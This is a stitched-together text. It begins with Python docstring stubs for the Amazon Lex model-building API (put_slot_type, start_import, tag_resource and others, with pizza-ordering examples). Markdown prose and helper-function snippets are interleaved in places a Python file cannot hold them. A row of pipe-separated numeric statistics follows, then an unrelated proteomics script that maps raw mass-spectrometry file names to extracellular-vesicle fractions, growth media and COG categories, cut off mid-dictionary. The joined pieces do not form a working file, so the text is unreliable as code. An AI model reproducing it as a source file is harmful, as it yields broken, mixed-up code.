'contentType': 'PlainText',
},
],
'responseCard': 'foo',
},
'confirmationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'Should I order your {Crust} crust {Type} pizza with {Sauce} sauce?',
'contentType': 'PlainText',
},
],
},
'createdDate': 1494359783.453,
'description': 'Order a pizza from a local pizzeria.',
'fulfillmentActivity': {
'type': 'ReturnIntent',
},
'lastUpdatedDate': 1494359783.453,
'rejectionStatement': {
'messages': [
{
'content': "Ok, I'll cancel your order.",
'contentType': 'PlainText',
},
{
'content': 'I cancelled your order.',
'contentType': 'PlainText',
},
],
},
'sampleUtterances': [
'Order me a pizza.',
'Order me a {Type} pizza.',
'I want a {Crust} crust {Type} pizza',
'I want a {Crust} crust {Type} pizza with {Sauce} sauce.',
],
'slots': [
{
'name': 'Sauce',
'description': 'The type of sauce to use on the pizza.',
'priority': 3,
'sampleUtterances': [
'Make it {Sauce} sauce.',
"I'd like {Sauce} sauce.",
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaSauceType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'White or red sauce?',
'contentType': 'PlainText',
},
{
'content': 'Garlic or tomato sauce?',
'contentType': 'PlainText',
},
],
},
},
{
'name': 'Type',
'description': 'The type of pizza to order.',
'priority': 1,
'sampleUtterances': [
'Get me a {Type} pizza.',
'A {Type} pizza please.',
"I'd like a {Type} pizza.",
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'What type of pizza would you like?',
'contentType': 'PlainText',
},
{
'content': 'Vegie or cheese pizza?',
'contentType': 'PlainText',
},
{
'content': 'I can get you a vegie or a cheese pizza.',
'contentType': 'PlainText',
},
],
},
},
{
'name': 'Crust',
'description': 'The type of pizza crust to order.',
'priority': 2,
'sampleUtterances': [
'Make it a {Crust} crust.',
"I'd like a {Crust} crust.",
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaCrustType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'What type of crust would you like?',
'contentType': 'PlainText',
},
{
'content': 'Thick or thin crust?',
'contentType': 'PlainText',
},
],
},
},
],
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'name': 'string',
'description': 'string',
'slots': [
{
'name': 'string',
'description': 'string',
'slotConstraint': 'Required'|'Optional',
'slotType': 'string',
'slotTypeVersion': 'string',
'valueElicitationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'priority': 123,
'sampleUtterances': [
'string',
],
'responseCard': 'string',
'obfuscationSetting': 'NONE'|'DEFAULT_OBFUSCATION'
},
],
'sampleUtterances': [
'string',
],
'confirmationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'followUpPrompt': {
'prompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
}
},
'conclusionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'dialogCodeHook': {
'uri': 'string',
'messageVersion': 'string'
},
'fulfillmentActivity': {
'type': 'ReturnIntent'|'CodeHook',
'codeHook': {
'uri': 'string',
'messageVersion': 'string'
}
},
'parentIntentSignature': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'createVersion': True|False
}
:returns:
A confirmation prompt to ask the user to confirm an intent. For example, "Shall I order your pizza?"
A conclusion statement to send to the user after the intent has been fulfilled. For example, "I placed your pizza order."
A follow-up prompt that asks the user for additional activity. For example, asking "Do you want to order a drink with your pizza?"
"""
pass
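The prompt and statement structures documented above (confirmationPrompt, rejectionStatement, conclusionStatement, valueElicitationPrompt) all share the same messages layout: a list of {'contentType', 'content'} dicts, optionally wrapped with maxAttempts. A minimal, hypothetical helper for building that shape — the function name is illustrative, not part of this client:

```python
def plain_text_prompt(texts, max_attempts=1):
    """Build a Lex prompt dict from plain-text strings.

    Produces the {'messages': [...], 'maxAttempts': ...} shape used by
    confirmationPrompt and valueElicitationPrompt in put_intent.
    """
    return {
        'messages': [
            {'contentType': 'PlainText', 'content': text}
            for text in texts
        ],
        'maxAttempts': max_attempts,
    }

# Example: the confirmation prompt from the pizza-ordering example.
prompt = plain_text_prompt(
    ['Should I order your {Crust} crust {Type} pizza with {Sauce} sauce?']
)
```

The same helper output can be passed directly as the confirmationPrompt argument of put_intent.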
def put_slot_type(name=None, description=None, enumerationValues=None, checksum=None, valueSelectionStrategy=None, createVersion=None, parentSlotTypeSignature=None, slotTypeConfigurations=None):
"""
Creates a custom slot type or replaces an existing custom slot type.
To create a custom slot type, specify a name for the slot type and a set of enumeration values, which are the values that a slot of this type can assume. For more information, see how-it-works .
If you specify the name of an existing slot type, the fields in the request replace the existing values in the $LATEST version of the slot type. Amazon Lex removes the fields that you don\'t provide in the request. If you don\'t specify required fields, Amazon Lex throws an exception. When you update the $LATEST version of a slot type, if a bot uses the $LATEST version of an intent that contains the slot type, the bot\'s status field is set to NOT_BUILT .
This operation requires permissions for the lex:PutSlotType action.
See also: AWS API Documentation
Exceptions
:example: response = client.put_slot_type(
name='string',
description='string',
enumerationValues=[
{
'value': 'string',
'synonyms': [
'string',
]
},
],
checksum='string',
valueSelectionStrategy='ORIGINAL_VALUE'|'TOP_RESOLUTION',
createVersion=True|False,
parentSlotTypeSignature='string',
slotTypeConfigurations=[
{
'regexConfiguration': {
'pattern': 'string'
}
},
]
)
:type name: string
:param name: [REQUIRED]\nThe name of the slot type. The name is not case sensitive.\nThe name can\'t match a built-in slot type name, or a built-in slot type name with 'AMAZON.' removed. For example, because there is a built-in slot type called AMAZON.DATE , you can\'t create a custom slot type called DATE .\nFor a list of built-in slot types, see Slot Type Reference in the Alexa Skills Kit .\n
:type description: string
:param description: A description of the slot type.
:type enumerationValues: list
:param enumerationValues: A list of EnumerationValue objects that defines the values that the slot type can take. Each value can have a list of synonyms , which are additional values that help train the machine learning model about the values that it resolves for a slot.\nWhen Amazon Lex resolves a slot value, it generates a resolution list that contains up to five possible values for the slot. If you are using a Lambda function, this resolution list is passed to the function. If you are not using a Lambda function you can choose to return the value that the user entered or the first value in the resolution list as the slot value. The valueSelectionStrategy field indicates the option to use.\n\n(dict) --Each slot type can have a set of values. Each enumeration value represents a value the slot type can take.\nFor example, a pizza ordering bot could have a slot type that specifies the type of crust that the pizza should have. The slot type could include the values\n\nthick\nthin\nstuffed\n\n\nvalue (string) -- [REQUIRED]The value of the slot type.\n\nsynonyms (list) --Additional values related to the slot type value.\n\n(string) --\n\n\n\n\n\n
:type checksum: string
:param checksum: Identifies a specific revision of the $LATEST version.\nWhen you create a new slot type, leave the checksum field blank. If you specify a checksum you get a BadRequestException exception.\nWhen you want to update a slot type, set the checksum field to the checksum of the most recent revision of the $LATEST version. If you don\'t specify the checksum field, or if the checksum does not match the $LATEST version, you get a PreconditionFailedException exception.\n
:type valueSelectionStrategy: string
:param valueSelectionStrategy: Determines the slot resolution strategy that Amazon Lex uses to return slot type values. The field can be set to one of the following values:\n\nORIGINAL_VALUE - Returns the value entered by the user, if the user value is similar to the slot value.\nTOP_RESOLUTION - If there is a resolution list for the slot, return the first value in the resolution list as the slot type value. If there is no resolution list, null is returned.\n\nIf you don\'t specify the valueSelectionStrategy , the default is ORIGINAL_VALUE .\n
:type createVersion: boolean
:param createVersion: When set to true a new numbered version of the slot type is created. This is the same as calling the CreateSlotTypeVersion operation. If you do not specify createVersion , the default is false .
:type parentSlotTypeSignature: string
:param parentSlotTypeSignature: The built-in slot type used as the parent of the slot type. When you define a parent slot type, the new slot type has all of the same configuration as the parent.\nOnly AMAZON.AlphaNumeric is supported.\n
:type slotTypeConfigurations: list
:param slotTypeConfigurations: Configuration information that extends the parent built-in slot type. The configuration is added to the settings for the parent slot type.\n\n(dict) --Provides configuration information for a slot type.\n\nregexConfiguration (dict) --A regular expression used to validate the value of a slot.\n\npattern (string) -- [REQUIRED]A regular expression used to validate the value of a slot.\nUse a standard regular expression. Amazon Lex supports the following characters in the regular expression:\n\nA-Z, a-z\n0-9\nUnicode characters ('u<Unicode>')\n\nRepresent Unicode characters with four digits, for example 'u0041' or 'u005A'.\nThe following regular expression operators are not supported:\n\nInfinite repeaters: *, +, or {x,} with no upper bound.\nWild card (.)\n\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'enumerationValues': [
{
'value': 'string',
'synonyms': [
'string',
]
},
],
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'valueSelectionStrategy': 'ORIGINAL_VALUE'|'TOP_RESOLUTION',
'createVersion': True|False,
'parentSlotTypeSignature': 'string',
'slotTypeConfigurations': [
{
'regexConfiguration': {
'pattern': 'string'
}
},
]
}
Response Structure
(dict) --
name (string) --
The name of the slot type.
description (string) --
A description of the slot type.
enumerationValues (list) --
A list of EnumerationValue objects that defines the values that the slot type can take.
(dict) --
Each slot type can have a set of values. Each enumeration value represents a value the slot type can take.
For example, a pizza ordering bot could have a slot type that specifies the type of crust that the pizza should have. The slot type could include the values
thick
thin
stuffed
value (string) --
The value of the slot type.
synonyms (list) --
Additional values related to the slot type value.
(string) --
lastUpdatedDate (datetime) --
The date that the slot type was updated. When you create a slot type, the creation date and last update date are the same.
createdDate (datetime) --
The date that the slot type was created.
version (string) --
The version of the slot type. For a new slot type, the version is always $LATEST .
checksum (string) --
Checksum of the $LATEST version of the slot type.
valueSelectionStrategy (string) --
The slot resolution strategy that Amazon Lex uses to determine the value of the slot. For more information, see PutSlotType .
createVersion (boolean) --
True if a new version of the slot type was created. If the createVersion field was not specified in the request, the createVersion field is set to false in the response.
parentSlotTypeSignature (string) --
The built-in slot type used as the parent of the slot type.
slotTypeConfigurations (list) --
Configuration information that extends the parent built-in slot type.
(dict) --
Provides configuration information for a slot type.
regexConfiguration (dict) --
A regular expression used to validate the value of a slot.
pattern (string) --
A regular expression used to validate the value of a slot.
Use a standard regular expression. Amazon Lex supports the following characters in the regular expression:
A-Z, a-z
0-9
Unicode characters ("\u<Unicode>")
Represent Unicode characters with four digits, for example "\u0041" or "\u005A".
The following regular expression operators are not supported:
Infinite repeaters: *, +, or {x,} with no upper bound.
Wild card (.)
Exceptions
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
Examples
This example shows how to create a slot type that describes pizza sauces.
response = client.put_slot_type(
name='DocPizzaSauceType',
description='Available pizza sauces',
enumerationValues=[
{
'value': 'red',
},
{
'value': 'white',
},
],
)
print(response)
Expected Output:
{
'version': '$LATEST',
'name': 'DocPizzaSauceType',
'checksum': 'cfd00ed1-775d-4357-947c-aca7e73b44ba',
'createdDate': 1494356442.23,
'description': 'Available pizza sauces',
'enumerationValues': [
{
'value': 'red',
},
{
'value': 'white',
},
],
'lastUpdatedDate': 1494356442.23,
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'name': 'string',
'description': 'string',
'enumerationValues': [
{
'value': 'string',
'synonyms': [
'string',
]
},
],
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'valueSelectionStrategy': 'ORIGINAL_VALUE'|'TOP_RESOLUTION',
'createVersion': True|False,
'parentSlotTypeSignature': 'string',
'slotTypeConfigurations': [
{
'regexConfiguration': {
'pattern': 'string'
}
},
]
}
:returns:
thick
thin
stuffed
"""
pass
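The enumerationValues parameter described above is a list of {'value', 'synonyms'} dicts. A small hypothetical helper (illustrative only, not part of this client) that builds it from a plain mapping of canonical values to synonym lists:

```python
def build_enumeration_values(value_synonyms):
    """Convert {'value': [synonyms, ...]} into the Lex enumerationValues list."""
    values = []
    for value, synonyms in value_synonyms.items():
        entry = {'value': value}
        if synonyms:
            # synonyms are optional; only attach the key when there are any
            entry['synonyms'] = list(synonyms)
        values.append(entry)
    return values

# Example: a pizza-sauce slot type with one synonym per value.
sauces = build_enumeration_values({'red': ['tomato'], 'white': ['garlic']})
```

The resulting list can be passed directly as the enumerationValues argument of put_slot_type.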
def start_import(payload=None, resourceType=None, mergeStrategy=None, tags=None):
"""
Starts a job to import a resource to Amazon Lex.
See also: AWS API Documentation
Exceptions
:example: response = client.start_import(
payload=b'bytes',
resourceType='BOT'|'INTENT'|'SLOT_TYPE',
mergeStrategy='OVERWRITE_LATEST'|'FAIL_ON_CONFLICT',
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
:type payload: bytes
:param payload: [REQUIRED]\nA zip archive in binary format. The archive should contain one file, a JSON file containing the resource to import. The resource should match the type specified in the resourceType field.\n
:type resourceType: string
:param resourceType: [REQUIRED]\nSpecifies the type of resource to import. Each resource also imports any resources that it depends on.\n\nA bot imports dependent intents.\nAn intent imports dependent slot types.\n\n
:type mergeStrategy: string
:param mergeStrategy: [REQUIRED]\nSpecifies the action that the StartImport operation should take when there is an existing resource with the same name.\n\nFAIL_ON_CONFLICT - The import operation is stopped on the first conflict between a resource in the import file and an existing resource. The name of the resource causing the conflict is in the failureReason field of the response to the GetImport operation. OVERWRITE_LATEST - The import operation proceeds even if there is a conflict with an existing resource. The $LATEST version of the existing resource is overwritten with the data from the import file.\n\n
:type tags: list
:param tags: A list of tags to add to the imported bot. You can only add tags when you import a bot, you can\'t add tags to an intent or slot type.\n\n(dict) --A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.\n\nkey (string) -- [REQUIRED]The key for the tag. Keys are not case-sensitive and must be unique.\n\nvalue (string) -- [REQUIRED]The value associated with a key. The value may be an empty string but it can\'t be null.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'resourceType': 'BOT'|'INTENT'|'SLOT_TYPE',
'mergeStrategy': 'OVERWRITE_LATEST'|'FAIL_ON_CONFLICT',
'importId': 'string',
'importStatus': 'IN_PROGRESS'|'COMPLETE'|'FAILED',
'tags': [
{
'key': 'string',
'value': 'string'
},
],
'createdDate': datetime(2015, 1, 1)
}
Response Structure
(dict) --
name (string) --
The name given to the import job.
resourceType (string) --
The type of resource to import.
mergeStrategy (string) --
The action to take when there is a merge conflict.
importId (string) --
The identifier for the specific import job.
importStatus (string) --
The status of the import job. If the status is FAILED , you can get the reason for the failure using the GetImport operation.
tags (list) --
A list of tags added to the imported bot.
(dict) --
A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.
key (string) --
The key for the tag. Keys are not case-sensitive and must be unique.
value (string) --
The value associated with a key. The value may be an empty string but it can\'t be null.
createdDate (datetime) --
A timestamp for the date and time that the import job was requested.
Exceptions
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'name': 'string',
'resourceType': 'BOT'|'INTENT'|'SLOT_TYPE',
'mergeStrategy': 'OVERWRITE_LATEST'|'FAIL_ON_CONFLICT',
'importId': 'string',
'importStatus': 'IN_PROGRESS'|'COMPLETE'|'FAILED',
'tags': [
{
'key': 'string',
'value': 'string'
},
],
'createdDate': datetime(2015, 1, 1)
}
:returns:
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
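The payload parameter above must be a zip archive, passed as bytes, containing a single JSON file. A sketch of building such a payload with the standard library — the resource dict here is a stand-in, not a validated Lex export:

```python
import io
import json
import zipfile

def make_import_payload(resource, filename='resource.json'):
    """Zip a JSON-serializable resource into the bytes StartImport expects."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, 'w', zipfile.ZIP_DEFLATED) as archive:
        # The archive must contain exactly one JSON file.
        archive.writestr(filename, json.dumps(resource))
    return buffer.getvalue()

# Hypothetical resource dict for illustration only.
payload = make_import_payload({'metadata': {'importType': 'LEX'}})
```

The returned bytes can then be supplied as payload=... in the start_import call shown above.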
def tag_resource(resourceArn=None, tags=None):
"""
Adds the specified tags to the specified resource. If a tag key already exists, the existing value is replaced with the new value.
See also: AWS API Documentation
Exceptions
:example: response = client.tag_resource(
resourceArn='string',
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
:type resourceArn: string
:param resourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the bot, bot alias, or bot channel to tag.\n
:type tags: list
:param tags: [REQUIRED]\nA list of tag keys to add to the resource. If a tag key already exists, the existing value is replaced with the new value.\n\n(dict) --A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.\n\nkey (string) -- [REQUIRED]The key for the tag. Keys are not case-sensitive and must be unique.\n\nvalue (string) -- [REQUIRED]The value associated with a key. The value may be an empty string but it can\'t be null.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.LimitExceededException
:return: {}
:returns:
(dict) --
"""
pass
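As documented above, tags is a list of {'key', 'value'} dicts rather than a plain mapping. A hypothetical convenience wrapper (illustrative, not part of the client) that converts between the two shapes:

```python
def to_tag_list(tags):
    """Convert {'Team': 'NLP'} into [{'key': 'Team', 'value': 'NLP'}]."""
    return [{'key': key, 'value': value} for key, value in tags.items()]

def from_tag_list(tag_list):
    """Inverse of to_tag_list, for reading tags back out of a response."""
    return {tag['key']: tag['value'] for tag in tag_list}

# Example round trip with two illustrative tags.
tags = to_tag_list({'Team': 'NLP', 'Stage': 'prod'})
```

The to_tag_list output matches the tags argument accepted by tag_resource and start_import.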
def untag_resource(resourceArn=None, tagKeys=None):
"""
Removes tags from a bot, bot alias or bot channel.
See also: AWS API Documentation
Exceptions
:example: response = client.untag_resource(
resourceArn='string',
tagKeys=[
'string',
]
)
:type resourceArn: string
:param resourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource to remove the tags from.\n
:type tagKeys: list
:param tagKeys: [REQUIRED]\nA list of tag keys to remove from the resource. If a tag key does not exist on the resource, it is ignored.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.LimitExceededException
:return: {}
:returns:
(dict) --
"""
pass
| 35.083457 | 2,831 | 0.655237 | 27,837 | 236,252 | 5.549736 | 0.04203 | 0.012687 | 0.053519 | 0.007612 | 0.856707 | 0.838428 | 0.823022 | 0.802244 | 0.790858 | 0.77784 | 0 | 0.008483 | 0.260053 | 236,252 | 6,733 | 2,832 | 35.088668 | 0.875245 | 0.979979 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.5 | 0.023256 | 0 | 0.523256 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 11 |
cb19ebe29c5ceb794cf2373f2b9d82c85d3f65e7 | 8,862 | py | Python | src/mapping.py | vrrodovalho/evs-proteomics | 25163e6ff32f89ffc9969a873a43b2fb905a6e0c | [
"CC0-1.0"
] | null | null | null | src/mapping.py | vrrodovalho/evs-proteomics | 25163e6ff32f89ffc9969a873a43b2fb905a6e0c | [
"CC0-1.0"
] | null | null | null | src/mapping.py | vrrodovalho/evs-proteomics | 25163e6ff32f89ffc9969a873a43b2fb905a6e0c | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jun 29 03:28:55 2019
@author: rodovalhovr
"""
fractions_CR = {
'UF7':['20190524_18-053_1-1','20190524_18-053_1-2',
'20190524_18-053_2-1','20190524_18-053_2-2_suite',
'20190524_18-053_3-1','20190524_18-053_3-2'],
'UF8':['20190524_18-053_4-1','20190524_18-053_4-2',
'20190524_18-053_5-1','20190524_18-053_5-2',
'20190524_18-053_6-1','20190524_18-053_6-2'],
'UF9':['20190524_18-053_7-1','20190524_18-053_7-2',
'20190524_18-053_8-1','20190524_18-053_8-2',
'20190524_18-053_9-1','20190524_18-053_9-2'],
'YF7':['20190524_18-053_10-1','20190524_18-053_10-2',
'20190524_18-053_11-1','20190524_18-053-11-2',
'20190524_18-053_12-1','20190524_18-053_12-2'],
'YF8':['20190524_18-053_13-1','20190524_18-053_13-2',
'20190524_18-053_14-1','20190524_18-053_14-2',
'20190524_18-053_15-1','20190524_18-053_15-2'],
'YF9':['20190524_18-053_16-1','20190524_18-053_16-2',
'20190524_18-053_17-1','20190524_18-053_17-2',
'20190524_18-053_18-1','20190524_18-053_18-2'] }
# NOTE: finer-grained grouping (one key per replicate, a/b/c); this
# assignment overrides the coarser fractions_CR dict defined above.
fractions_CR = {
'UF7a' : ['20190524_18-053_1-1', '20190524_18-053_1-2'],
'UF7b' : ['20190524_18-053_2-1', '20190524_18-053_2-2_suite'],
'UF7c' : ['20190524_18-053_3-1', '20190524_18-053_3-2'],
'UF8a' : ['20190524_18-053_4-1', '20190524_18-053_4-2'],
'UF8b' : ['20190524_18-053_5-1', '20190524_18-053_5-2'],
'UF8c' : ['20190524_18-053_6-1', '20190524_18-053_6-2'],
'UF9a' : ['20190524_18-053_7-1', '20190524_18-053_7-2'],
'UF9b' : ['20190524_18-053_8-1', '20190524_18-053_8-2'],
'UF9c' : ['20190524_18-053_9-1', '20190524_18-053_9-2'],
'YF7a' : ['20190524_18-053_10-1', '20190524_18-053_10-2'],
'YF7b' : ['20190524_18-053_11-1', '20190524_18-053-11-2'],
'YF7c' : ['20190524_18-053_12-1', '20190524_18-053_12-2'],
'YF8a' : ['20190524_18-053_13-1', '20190524_18-053_13-2'],
'YF8b' : ['20190524_18-053_14-1', '20190524_18-053_14-2'],
'YF8c' : ['20190524_18-053_15-1', '20190524_18-053_15-2'],
'YF9a' : ['20190524_18-053_16-1', '20190524_18-053_16-2'],
'YF9b' : ['20190524_18-053_17-1', '20190524_18-053_17-2'],
'YF9c' : ['20190524_18-053_18-1', '20190524_18-053_18-2'] }
fractions_UC = {
'UF2':['20181107_18-053_1_1','20181107_18-053_1_2',
'20181107_18-053_1_3','20181107_18-053_1_4',
'20181107_18-053_2_1','20181107_18-053_2_2',
'20181107_18-053_2_3','20181107_18-053_2_4',
'20181107_18-053_3_1','20181107_18-053_3_2',
'20181107_18-053_3_3','20181107_18-053_3_4'],
'UF3':['20181107_18-053_4_1','20181107_18-053_4_2',
'20181107_18-053_4_3','20181107_18-053_4_4',
'20181107_18-053_5_1','20181107_18-053_5_2',
'20181107_18-053_5_3','20181107_18-053_5_4',
'20181107_18-053_6_1','20181107_18-053_6_2',
'20181107_18-053_6_3','20181107_18-053_6_4'],
'UF4':['20181107_18-053_7_1','20181107_18-053_7_2',
'20181107_18-053_7_3','20181107_18-053_7_4',
'20181107_18-053_8_1','20181107_18-053_8_2',
'20181107_18-053_8_3','20181107_18-053_8_4',
'20181107_18-053_9_1','20181107_18-053_9_2',
'20181107_18-053_9_3','20181107_18-053_9_4'],
'YF2':['20181107_18-053_10_1','20181107_18-053_10_2',
'20181107_18-053_10_3','20181107_18-053_10_4',
'20181107_18-053_11_1','20181107_18-053_11_2',
'20181107_18-053_11_3','20181107_18-053_11_4',
'20181107_18-053_12_1','20181107_18-053_12_2',
'20181107_18-053_12_3','20181107_18-053_12_4'],
'YF3':['20181107_18-053_13_1','20181107_18-053_13_2',
'20181107_18-053_13_3','20181107_18-053_13_4',
'20181107_18-053_14_1','20181107_18-053_14_2',
'20181107_18-053_14_3','20181107_18-053_14_4',
'20181107_18-053_15_1','20181107_18-053_15_2',
'20181107_18-053_15_3','20181107_18-053_15_4'],
'YF4':['20181107_18-053_16_1','20181107_18-053_16_2',
'20181107_18-053_16_3','20181107_18-053_16_4',
'20181107_18-053_17_1','20181107_18-053_17_2',
'20181107_18-053_17_3','20181107_18-053_17_4',
'20181107_18-053_18_1','20181107_18-053_18_2',
'20181107_18-053_18_3','20181107_18-053_18_4'] }
# NOTE: finer-grained grouping (one key per replicate, a/b/c); this
# assignment overrides the coarser fractions_UC dict defined above.
fractions_UC = {
'UF2a' : ['20181107_18-053_1_1','20181107_18-053_1_2',
'20181107_18-053_1_3','20181107_18-053_1_4'],
'UF2b' : ['20181107_18-053_2_1','20181107_18-053_2_2',
'20181107_18-053_2_3','20181107_18-053_2_4'],
'UF2c' : ['20181107_18-053_3_1','20181107_18-053_3_2',
'20181107_18-053_3_3','20181107_18-053_3_4'],
'UF3a' : ['20181107_18-053_4_1','20181107_18-053_4_2',
'20181107_18-053_4_3','20181107_18-053_4_4'],
'UF3b' : ['20181107_18-053_5_1','20181107_18-053_5_2',
'20181107_18-053_5_3','20181107_18-053_5_4'],
'UF3c' : ['20181107_18-053_6_1','20181107_18-053_6_2',
'20181107_18-053_6_3','20181107_18-053_6_4'],
'UF4a' : ['20181107_18-053_7_1','20181107_18-053_7_2',
'20181107_18-053_7_3','20181107_18-053_7_4'],
'UF4b' : ['20181107_18-053_8_1','20181107_18-053_8_2',
'20181107_18-053_8_3','20181107_18-053_8_4'],
'UF4c' : ['20181107_18-053_9_1','20181107_18-053_9_2',
'20181107_18-053_9_3','20181107_18-053_9_4'],
'YF2a' : ['20181107_18-053_10_1','20181107_18-053_10_2',
'20181107_18-053_10_3','20181107_18-053_10_4'],
'YF2b' : ['20181107_18-053_11_1','20181107_18-053_11_2',
'20181107_18-053_11_3','20181107_18-053_11_4'],
'YF2c' : ['20181107_18-053_12_1','20181107_18-053_12_2',
'20181107_18-053_12_3','20181107_18-053_12_4'],
'YF3a' : ['20181107_18-053_13_1','20181107_18-053_13_2',
'20181107_18-053_13_3','20181107_18-053_13_4'],
'YF3b' : ['20181107_18-053_14_1','20181107_18-053_14_2',
'20181107_18-053_14_3','20181107_18-053_14_4'],
'YF3c' : ['20181107_18-053_15_1','20181107_18-053_15_2',
'20181107_18-053_15_3','20181107_18-053_15_4'],
'YF4a' : ['20181107_18-053_16_1','20181107_18-053_16_2',
'20181107_18-053_16_3','20181107_18-053_16_4'],
'YF4b' : ['20181107_18-053_17_1','20181107_18-053_17_2',
'20181107_18-053_17_3','20181107_18-053_17_4'],
'YF4c' : ['20181107_18-053_18_1','20181107_18-053_18_2',
'20181107_18-053_18_3','20181107_18-053_18_4'] }
media_CR = {'UF':['UF7','UF8','UF9'], 'YEL':['YF7','YF8','YF9']}
media_UC = {'UF':['UF2','UF3','UF4'], 'YEL':['YF2','YF3','YF4']}
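The dictionaries above map each fraction to its raw-file runs, and each medium to its fractions. A small sketch of the reverse lookup — finding which fraction a given raw file belongs to — using a trimmed stand-in for the real fractions_CR dict:

```python
# Trimmed stand-in for the fractions_CR dict defined above.
fractions = {
    'UF7a': ['20190524_18-053_1-1', '20190524_18-053_1-2'],
    'YF7a': ['20190524_18-053_10-1', '20190524_18-053_10-2'],
}

# Invert fraction -> runs into run -> fraction for per-file lookups.
run_to_fraction = {
    run: fraction
    for fraction, runs in fractions.items()
    for run in runs
}
```

The same inversion works unchanged on the full fractions_CR and fractions_UC dicts.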
print_basic_parameters = {
'columns' : True,
'size' : True,
'empties' : True,
'duplicates' : True,
'check_columns' : ['query_name', 'Sequence', 'locus_tag']}
export_fasta_parameters = {
'output_file_name' : "PF129_EVs_CR_YEL-only.fasta",
'id_columns' : ["query_name","gi","emb","description",
"method","medium_UC", 'medium_CR'],
'seq_column' : 'Sequence',
'filters' : {'method': ['EVs-CR', 'EVs-CR/UC'],
'medium_CR' : ['YEL']}}
COGs = {
'A': 'A: RNA processing and modification',
'B': 'B: Chromatin structure and dynamics',
'C': 'C: Energy production and conversion',
'D': 'D: Cell cycle control, cell division, chromosome partitioning',
'E': 'E: Amino acid transport and metabolism',
'F': 'F: Nucleotide transport and metabolism',
'G': 'G: Carbohydrate transport and metabolism',
'H': 'H: Coenzyme transport and metabolism',
'I': 'I: Lipid transport and metabolism',
'J': 'J: Translation, ribosomal structure and biogenesis',
'K': 'K: Transcription',
'L': 'L: Replication, recombination and repair',
'M': 'M: Cell wall/membrane/envelope biogenesis',
'N': 'N: Cell motility',
